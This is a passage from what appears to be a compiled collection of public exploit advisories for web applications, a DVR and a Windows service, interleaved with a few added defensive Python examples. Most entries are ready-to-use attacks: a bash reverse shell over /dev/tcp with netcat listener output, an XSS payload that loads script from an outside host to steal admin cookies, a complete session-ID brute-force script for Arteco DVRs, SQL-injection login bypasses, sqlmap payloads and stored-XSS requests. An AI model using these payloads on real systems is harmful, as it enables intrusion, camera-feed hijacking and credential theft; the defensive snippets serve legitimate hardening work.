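    ("127.0.0.1", 200, "host", "appserver.test.local", "=1336+1"),
    ("127.0.0.1", 200, "host", "www.test.local", "@SUM(1+1)"),
    ("127.0.0.1", 200, "host", "mail.test.local", "nginx"),
]

if __name__ == "__main__":
    print(write_report(SAMPLE_ROWS), end="")
```

Neutralizing at write time is the right layer: the value may be displayed safely on a terminal (as in the advisory's table) and only becomes dangerous once it is handed to a spreadsheet, so the CSV writer is the component that must apply the rule.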
-
Click2Magic 1.1.5 - Stored Cross-Site Scripting
# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting
# Exploit Author: Shivam Verma(cyb3r_n3rd)
# Date: 2020-12-25
# Google Dork: N/A
# Vendor Homepage: https://www.click2magic.com/user/agent/index
# Software Link: https://www.click2magic.com
# Version: 1.1.5
# Category: Web Application
# Tested on: Kali Linux

Attack Vector: This vulnerability lets an attacker inject malicious payloads in the chat section; each time the admin/user visits and manages the user data, the malicious payload (XSS) triggers and the attacker can capture the admin cookies and access the users' data.

Step 1. Visit the link
Step 2. Start a new chat
Step 3. When asked for a name, paste your XSS payload
Step 4. Wait for the administrator to click on your link
Step 5. You will receive the admin cookie every time he processes the request

---
XSS Payload: "><script src=https://.xss.ht></script>
-
Subrion CMS 4.2.1 - 'avatar[path]' XSS
# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
# Date: 2020-12-15
# Exploit Author: icekam
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
# Software Link: https://github.com/intelliants/subrion
# Version: Subrion CMS 4.2.1
# CVE : CVE-2020-35437

Stored XSS vulnerability in /_core/profile/. Reproduce through the avatar[path] parameter in a POST to the /_core/profile/ URL.

payload: "><sCrIpT>alert(1)</sCrIpT>

https://github.com/intelliants/subrion/issues/880
-
CMS Made Simple 2.2.15 - RCE (Authenticated)
# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.

// Vulnerable eval() code
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags
2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");
3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
-
Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
# Date: 2021-01-04
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 8.0.0.1039
# File Version: 8.0.0.1039
# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname, pathname, startmode, startname

DisplayName                            Name      PathName                                                                 StartMode  StartName
Intel(R) Matrix Storage Event Monitor  IAANTMON  C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "IAANTMON"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: IAANTMON
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Intel(R) Matrix Storage Event Monitor
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:
To exploit this vulnerability an attacker needs to drop a malicious executable into the service path undetected by the OS in order to gain SYSTEM privileges.
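Both the MiniTool ShadowMaker entry and this Intel entry are the same finding: a service ImagePath that contains spaces but is not wrapped in quotes. The following is an added audit example, not either advisory's code: it takes service records in the shape `wmic service get name, pathname` returns, flags the unquoted-with-space case, lists the intermediate paths the Windows process loader would try first (the locations whose write permissions must be checked), and produces the quoted path that fixes the record. The two vulnerable paths are the ones quoted above; the other sample records are constructed controls, and the function names are assumptions.

```python
import re

# Constructed sample records (name, PathName). The first two paths are the ones the
# advisories above report; the remaining three are made-up controls, not findings.
SAMPLE_SERVICES = [
    ("MTAgentService", r"C:\Program Files\MiniTool ShadowMaker\AgentService.exe"),
    ("IAANTMON", r"C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("ExampleSvc", r'"C:\Program Files\Example Vendor\svc.exe" -service'),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]


def executable_part(pathname: str) -> str:
    """Portion of an unquoted ImagePath up to and including the first '.exe'.

    Anything after that is the service's argument string, where spaces are harmless.
    """
    m = re.match(r".*?\.exe", pathname, re.IGNORECASE)
    return m.group(0) if m else pathname


def is_unquoted_service_path(pathname: str) -> bool:
    """True when the path is not quoted and its executable part contains a space."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    return " " in executable_part(p)


def ambiguous_candidates(pathname: str) -> list:
    """Files the loader would try before the real binary, one per space in the
    executable part (prefix up to the space, with .exe appended). A writable
    location among these is what turns the finding into a privilege escalation."""
    words = executable_part(pathname.strip()).split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def quoted_path(pathname: str) -> str:
    """The corrected ImagePath: executable wrapped in double quotes, arguments kept."""
    p = pathname.strip()
    exe = executable_part(p)
    return f'"{exe}"{p[len(exe):]}'


def audit(services):
    """Return (name, path, candidate hijack paths, corrected path) for each finding."""
    findings = []
    for name, path in services:
        if is_unquoted_service_path(path):
            findings.append((name, path, ambiguous_candidates(path), quoted_path(path)))
    return findings


if __name__ == "__main__":
    for name, path, candidates, fixed in audit(SAMPLE_SERVICES):
        print(f"[!] {name}: {path}")
        for c in candidates:
            print(f"    loader would try: {c}")
        print(f"    corrected ImagePath: {fixed}")
```

On a real host the records come from `wmic` or `Get-CimInstance Win32_Service`; the parsing here starts from the (name, path) pairs so the decision logic can be tested offline.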
-
IncomCMS 2.0 - Insecure File Upload
# Exploit Title: IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage: https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
    <title>Upload your files</title>
</head>
<body>
    <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
        <p>Upload your file</p>
        <input type="file" name="Filedata"><br />
        <input type="submit" value="Upload">
    </form>
</body>
</html>
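Three entries on this page are variations of one server-side mistake: the Adning plugin let the request choose both the allowed extensions and the target directory (`"dir": "../"`), the Advanced Comment System entry resolves a client path with `../` sequences and a `%00` terminator, and this IncomCMS handler accepts a file with no checks at all. The following is an added defensive example, not the code of any of those projects: a single path-policy function that fixes the extension allow-list on the server, keeps only the final path component, refuses NUL bytes, rejects stacked extensions such as `shell.php.jpg`, and only honours a directory hint when the resolved target still lies inside the upload root. The function and class names and the `/tmp/uploads_example` root are assumptions; authentication and per-user authorization for the upload endpoint are separate controls not shown here.

```python
import os
import pathlib

# Server-side policy. Never read from the request (the Adning flaw let the client
# send allowed_file_types and a directory hint).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


class UploadRejected(ValueError):
    """Raised for any name or location the policy does not accept."""


def safe_upload_path(upload_root: str, client_filename: str, subdir: str = "") -> pathlib.Path:
    """Compute where an uploaded file may be written, or raise UploadRejected.

    `subdir` stands in for any client-influenced directory hint; it is honoured only
    when the final, resolved path is still inside `upload_root`.
    """
    root = pathlib.Path(upload_root).resolve()
    if "\x00" in client_filename or "\x00" in subdir:
        # The %00 trick from the ACS advisory: a NUL truncates the name in C-based APIs.
        raise UploadRejected("NUL byte in name")
    # Keep only the last component. This discards ../ sequences, absolute prefixes and
    # backslash-separated Windows paths alike.
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise UploadRejected("empty or dot name")
    suffixes = [s.lower() for s in pathlib.PurePosixPath(name).suffixes]
    # Every suffix must be allowed, so shell.php.jpg is rejected, not only shell.php.
    # (Conservative: a benign "my.photo.jpg" is refused too.)
    if not suffixes or any(s not in ALLOWED_EXTENSIONS for s in suffixes):
        raise UploadRejected(f"extension(s) {suffixes} not allowed")
    target = (root / subdir / name).resolve()
    # Containment check on the resolved path: commonpath must be the root itself.
    if os.path.commonpath([str(root), str(target)]) != str(root):
        raise UploadRejected("target escapes upload root")
    return target


if __name__ == "__main__":
    ROOT = "/tmp/uploads_example"   # assumed upload directory
    # Constructed request values: one benign name and the patterns from the advisories.
    for filename, hint in [("cat.jpg", ""), ("shell.php", ""), ("shell.php.jpg", ""),
                           ("cat.jpg", "../"), ("../../etc/passwd\x00.jpg", "")]:
        try:
            print(repr((filename, hint)), "->", safe_upload_path(ROOT, filename, hint))
        except UploadRejected as exc:
            print(repr((filename, hint)), "-> rejected:", exc)
```

The order of the checks matters less than the fact that the last one operates on the fully resolved target: any `..` that survives earlier normalisation is caught by the containment test rather than by string matching.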
-
Arteco Web Client DVR/NVR - 'SessionId' Brute Force
# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
# Date: 16.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.arteco-global.com

#!/usr/bin/env python3
#
#
# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
#
#
# Vendor: Arteco S.U.R.L.
# Product web page: https://www.arteco-global.com
# Affected version: n/a
#
# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
# ideal for those who need to manage IP video surveillance designed for
# medium to large installations that require high performance and reliability.
# Arteco can handle IP video sources from all major international manufacturers
# and is compatible with ONVIF and RTSP devices.
#
# Desc: The Session ID 'SessionId' is of an insufficient length and can be
# exploited by brute force, which may allow a remote attacker to obtain a
# valid session, bypass authentication and disclose the live camera stream.
#
# Tested on: Microsoft Windows 10 Enterprise
#            Apache/2.4.39 (Win64) OpenSSL/1.0.2s
#            Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
#            Arteco-Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5613
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
#
#
# 16.11.2020
#

import sys,requests

class BrutusCookius:
    def __init__(self):
        self.validate=None
        self.cookies=None
        self.params=None
        self.stream=None
        self.path=None
        self.cgi=None
        self.ip=None
        self.op=None

    def check(self):
        print('Usage: ./arteco.py IP')
        exit(9)

    def bro(self):
        if len(sys.argv) !=2:
            self.check()
        else:
            self.ip=sys.argv[1]
            print('[+] Target IP: '+self.ip)
        if not 'http' in self.ip:
            self.ip='http://{}'.format(self.ip)

    def force(self):
        # Check the Set-Cookie on the target and determine the length (varies per model/version)
        # Cookie: SessionId=15800 - range(10000,100000)
        # Cookie: SessionId=8350  - range(1000,10000)
        # Cookie: SessionId=502   - range(100,1000)
        self.op = range(17129,17149) # Tweak
        for j in self.op:
            session=requests.session()
            self.cookies=dict(SessionId=str(j))
            sys.stdout.write('[+] Trying ID: '+str(j))
            self.path='/arteco-mobile/'
            self.cgi='camera.fcgi'
            self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
            self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
            if not 'artecomobile' in str(self.validate):
                print(' - NOPE.')
            else:
                print(' - BINGO!!!')
                print('[+] Active session found: '+str(j))
                print('[+] Use the cookie: SessionId='+str(j))
                exit(9)
        print('[!] Sorry, no valid session found.')

    def main(self):
        self.bro()
        self.force()

if __name__ == '__main__':
    BrutusCookius().main()
-
WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
# Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/stripe-payments/#developers
# Exploit Author: Park Won Seok
# Contact: [email protected]
# Category: Webapps
# Version: stripe-payments (Ver_2.0.39)
# Tested on: Windows 10 x64

# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver_2.0.39)
# Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting.

# POC - Stored Cross-Site Scripting

POST /wp-admin/options.php HTTP/1.1
Host: localhost
Content-Length: 5786
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.131/wp-admin/edit.php?post_type=asp-products&page=stripe-payments-settings
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie: wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7C50b0c8ba4dcc6dfdd756418c9fc960d3736f93a0febf165408110ea815dbab03; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7Cb3e517e751d2519dc5473f911230fe31c966c9c755f193344b4bdea80a09d8b4; asp_transient_id=36985e31f4be2b5ae0e14586c592c87d; wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist; wp-settings-time-1=1608903490
Connection: close

wp-asp-urlHash=general&option_page=AcceptStripePayments-settings-group&action=update&_wpnonce=eee296fed3&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings&AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fstripe-checkout-result%2F&asp_products_page_url_value=http%3A%2F%2F192.168.31.131%2Fproducts%2F& *AcceptStripePayments-settings%5Bcurrency_code%5D=USDjk9v0%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3edr45t* &AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=&AcceptStripePayments-settings%5Bpopup_default_country%5D=0&AcceptStripePayments-settings%5Bapi_publishable_key%5D=1&AcceptStripePayments-settings%5Bapi_secret_key%5D=2&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=3&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=4&AcceptStripePayments-settings%5Bbuyer_email_type%5D=text&AcceptStripePayments-settings%5Bfrom_email_address%5D=test+%3Csales% 40your-domain.com %3E&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+the+purchase&AcceptStripePayments-settings%5Bbuyer_email_body%5D=Hello%0D%0A%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28s%29%3A%0D%0A%0D%0A%7Bproduct_details%7D&AcceptStripePayments-settings%5Bseller_notification_email%5D=localhost% 40google.com <http://40naver.com/> &AcceptStripePayments-settings%5Bseller_email_type%5D=text&AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+Seller%0D%0A%0D%0AThis+mail+is+to+notify+you+of+a+product+sale.%0D%0A%0D%0A%7Bproduct_details%7D%0D%0A%0D%0AThe+sale+was+made+to+%7Bpayer_email%7D%0D%0A%0D%0AThanks&AcceptStripePayments-settings%5Bsend_email_on_error_to%5D=localhost% 40google.com <http://40naver.com/> 
&AcceptStripePayments-settings%5Bprice_currency_pos%5D=left&AcceptStripePayments-settings%5Bprice_decimal_sep%5D=.&AcceptStripePayments-settings%5Bprice_thousand_sep%5D=%2C&AcceptStripePayments-settings%5Bprice_decimals_num%5D=2&AcceptStripePayments-settings%5Bcustom_field_name%5D=&AcceptStripePayments-settings%5Bcustom_field_descr%5D=&AcceptStripePayments-settings%5Bcustom_field_descr_location%5D=placeholder&AcceptStripePayments-settings%5Bcustom_field_position%5D=above&AcceptStripePayments-settings%5Bcustom_field_type%5D=text&AcceptStripePayments-settings%5Bcustom_field_validation%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_regex%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_err_msg%5D=Please+enter+valid+data&AcceptStripePayments-settings%5Btos_text%5D=I+accept+the+%3Ca+href%3D%22https%3A%2F%2Fexample.com%2Fterms-and-conditions%2F%22+target%3D%22_blank%22%3ETerms+and+Conditions%3C%2Fa%3E&AcceptStripePayments-settings%5Btos_position%5D=above&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUSD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEUR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BGBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BAUD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BARS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBAM%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBGN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBRL%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCAD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCLP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCNY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCOP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCZK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BDKK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEGP%5D=1&AcceptStripePayments-set
tings%5Ballowed_currencies%5D%5BHKD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHUF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BINR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BIDR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BILS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BJPY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BLBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMYR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMXN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNZD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNOK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPEN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPHP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPLN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRON%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRUB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSGD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BZAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BKRW%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSEK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCHF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTWD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTHB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTRY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUYU%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BVND%5D=1&AcceptStripePayments-settings%5Bpp_additional_css%5D=&AcceptStripePayments-settings%5Brecaptcha_site_key%5D=&AcceptStripePayments-settings%5Brecaptcha_secret_key%5D=&submit=Save+Changes
-
Resumes Management and Job Application Website 1.0 - Authentication Bypass
# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 - Go to url http://localhost/Resumes/login.html
Step 2 - Enter Username :- ' or '1'='1'#
Step 3 - Enter Password - anything
-
WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
# Exploit Title: WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/wp-paginate/
# Exploit Author: Park Won Seok
# Contact: [email protected]
# Category: Webapps
# Version: WP-Paginate(Ver-2.1.3)
# CVE : N/A
# Tested on: Windows 10 x64

# Description:
# A Stored Cross-site scripting (XSS) was discovered in the WordPress plugin WP-Paginate(Ver_2.1.3).
# Vulnerable parameter: the 2nd "preset" parameter is affected by Stored-XSS.

# POC - Stored-XSS

POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1
Host: localhost
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie: wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31; wordpress_test_cookie=WP%20Cookie%20check; asp_transient_id=36985e31f4be2b5ae0e14586c592c87d; wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1; wp-settings-time-1=1609001802; wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48
Connection: close

_wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default& *preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e* &before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes
-
Online Movie Streaming 1.0 - Authentication Bypass
# Exploit Title: Online Movie Streaming 1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 - Go to url http://localhost/onlinemovie/user-login.php
Step 2 - Enter Username :- [email protected]
Step 3 - Enter Password - ' or '1'='1'#
-
Responsive E-Learning System 1.0 - 'id' Sql Injection
# Exploit Title: Responsive E-Learning System 1.0 - 'id' Sql Injection
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql Injection.

Vulnerable Url: http://localhost/elearning/delete_teacher_students.php?id=17 -p id

# sqlmap -u http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:59:01 /2020-12-24/

[08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 402 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28 END))-- YDSn

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm
---
[08:59:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12
-
Baby Care System 1.0 - 'Post title' Stored XSS
# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Version: 1
# Tested on: Windows

Vulnerable Parameters: Edit Page tab

Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side.
2: Add a new post, then add the payload "<audio src/onerror=alert(document.cookie)>" in the "Post title" parameter and click the save button. The post is saved successfully.
3: Now the XSS is stored and triggers every time the page is loaded, and the attacker can steal authenticated users' cookies.